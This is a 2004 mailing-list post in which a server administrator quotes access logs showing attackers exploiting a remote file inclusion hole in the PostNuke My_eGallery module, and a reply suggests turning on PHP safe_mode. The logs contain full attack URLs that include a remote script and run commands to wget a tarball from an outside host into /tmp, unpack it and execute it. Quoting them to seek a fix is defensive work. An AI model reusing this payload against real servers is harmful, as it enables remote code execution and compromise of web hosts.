[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
RE: [cobalt-users] Howto trace hack
- Subject: RE: [cobalt-users] Howto trace hack
- From: "Bob Lenaerts" <bob@xxxxxxxxxx>
- Date: Fri Mar 19 10:17:34 2004
- List-id: Mailing list for users to share thoughts on Sun Cobalt products. <cobalt-users.list.cobalt.com>
See that safe_mode in php.ini is On , instead of Off.
Then no1 can use another user, but their own
bob
-----Original Message-----
From: cobalt-users-admin@xxxxxxxxxxxxxxx
[mailto:cobalt-users-admin@xxxxxxxxxxxxxxx] On Behalf Of Crocket
Sent: vrijdag 19 maart 2004 18:00
To: cobalt-users@xxxxxxxxxxxxxxx
Subject: RE: [cobalt-users] Howto trace hack
Hi,
The kiddies are trying it again and now I managed to identify them and
how they do it : They use the Postnuke My_eGallery module to execute the
crap from their site.
www.domain.com 80.96.33.10 - - [19/Mar/2004:12:43:19 +0100] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.mira
bela
.net/inject.txt?&cmd=cd%20/tmp;wget%20www.mirabela.net/LegendPort.tgz;ta
r%20
-zxvf%20LegendPort.tgz;cd%20LegendPort;./start/modules/My_eGallery/publi
c/di
splayCategory.php?%20basepath=http://www.mirabela.net/inject.txt?&cmd=cd
%20/
tmp;wget%20www.mirabela.net/LegendPort.tgz;tar%20-zxvf%20LegendPort.tgz;
cd%2
0LegendPort;./start HTTP/1.0" 404 1227 "-" "Mozilla/4.0 (compatible;
MSIE 5.5; Windows 98; Win 9x 4.90)" www.domain.com 80.96.33.10 - -
[19/Mar/2004:12:43:19 +0100] "GET /libImage/warning.gif HTTP/1.0" 200
871
"http://xxx.xxx.xxx.xxx/modules/My_eGallery/public/displayCategory.php?b
asep
ath=http://www.mirabela.net/inject.txt?&cmd=cd%20/tmp;wget%20www.mirabel
a.ne
t/LegendPort.tgz;tar%20-zxvf%20LegendPort.tgz;cd%20LegendPort;./start/mo
dule
s/My_eGallery/public/displayCategory.php?%20basepath=http://www.mirabela
.net
/inject.txt?&cmd=cd%20/tmp;wget%20www.mirabela.net/LegendPort.tgz;tar%20
-zxv
f%20LegendPort.tgz;cd%20LegendPort;./start" "Mozilla/4.0 (compatible;
MSIE 5.5; Windows 98; Win 9x 4.90)" www.domain.com 62.162.59.75 - -
[19/Mar/2004:15:53:19 +0100] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.alek
srul
z.com/hack.txt?&cmd=cd%20/tmp;wget%20mirabela.net/LegendPort.tgz;tar%20z
xvf%
20LegendPort.tgz;cd%20LegendPort;./start HTTP/1.1" 200 2861 "-"
"Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
I replaced my domain with www.domain.com and my ip with xxx.xxx.xxx.xxx
They are forcing the basepath which is probably a global in that module.
So they aren't even using a php upload form. Anyone know quick fix to
unset that global ? If not I will remove those modules from the sites
and warn my customers.
John